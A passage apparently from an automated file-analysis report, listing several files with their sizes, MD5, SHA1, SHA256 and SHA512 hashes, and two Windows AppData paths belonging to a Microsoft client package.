SHA5122bcf14833bc2b1be1d432d62451c423d427976eb2d383c608ada9e43a82b1b4545284252e608ddf1c5087d9ee56690f8a19b794eae7941b4386a51c2fed7befc
-
Filesize
50KB
MD5449f46ed956c025e0a33cc0e9e193228
SHA171380d288258b1cc0c555fcde625b10f5ae97451
SHA256ca9308c4df021f73168a2e9ecad87ef10f1d740cae229d3322e7099b6b2a9bed
SHA512f254a2a2dd715f640981663a435222fea83e4fc594792f2b5123b5d969629513fb02cbb36b5e68518317765517266cb09cf8e3285d51a3bc059370621cde7650
-
Filesize
41KB
MD5278f18b5b850831ced5d5d3f1e7b734f
SHA11033b5514bb741a3d15bc6d4f47ec422fa7fbac3
SHA2569fbeaed9fef719b269cccad31586db2f0b8201b3e3f9c682389ac1bd497a588a
SHA512d7d7ccf9f70a1f0fc91974c507b311403e0f6c6080e41c4c15e9d8656f3ba401d1b855e40154b6cc6835bcb9fe74f338f8e481932a7e10f48ca8d151eb128393
-
Filesize
55KB
MD50d686aec04fac005cd2ff648d776534f
SHA1e0adf54169c597f32545dadacf9bed2ffda2d3f9
SHA256b79c36970f9873b4b7199478fd6527396732907bd3a1de11539154ca91157f50
SHA51284ba80b82dada1fd83f117db5cd6f52cca9f21a1a36a549c19f347974b6fc2e8c1b8832e839b3d51ab38896b8269ef9a288a236b1ea2a0151701a4c514517d85
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\a8a00ad8-c9d9-4cce-b9ae-3d51e1db2cf4.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize23KB
MD5be4306ed23e3366c80b84db4f2f21e3b
SHA1e8ffe0e84930f28f44e86410450c7c303da78431
SHA2560bd4f69043a6efec682af5d1145a22127ae2d97bd66cce63e35132f85fff2778
SHA512a18bcad9ff46d69f79a6f49af210797b582bbb97b523b56b7b6a57cc37b34c5403bbfe259ec218a11853f557801ef61a260fb4dfad95f6453ef1a798c65b1fa6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
627KB
MD5feaff56d0d9b17f8f00ebed2482970d3
SHA13e23b591d688ad8ba7ead4e9fc9c46262eb842b6
SHA256a79c39b5f74307dfbc6f9fbb16031342bfb6a9042ccc89a27be9808c684fafe5
SHA5124b9872b19afa5b61355e3ded7d697efeb6f8644ba0619160c37ee8bfabc0c81f6a2fa5907889150cd2f39a70fb81d78a6665d2e13233f4b75e1e18599cd0b7c6
-
Filesize
154B
MD53ff9ce45b994c38b84895824d362b918
SHA152d52ecb89c0826a1e03febda221bf56476e7930
SHA2562dfd18edf3f3b98c9737e68416d79e85349721b3d1e37b651b62fb789ce512b2
SHA5126394e3680aa64f67b2249fde91b3107ba0beda24198ace240173ed4e9c543a12000bdd47d2ef4a664e6271010755d8361497c5094283ca1ef256f2bda64dabc7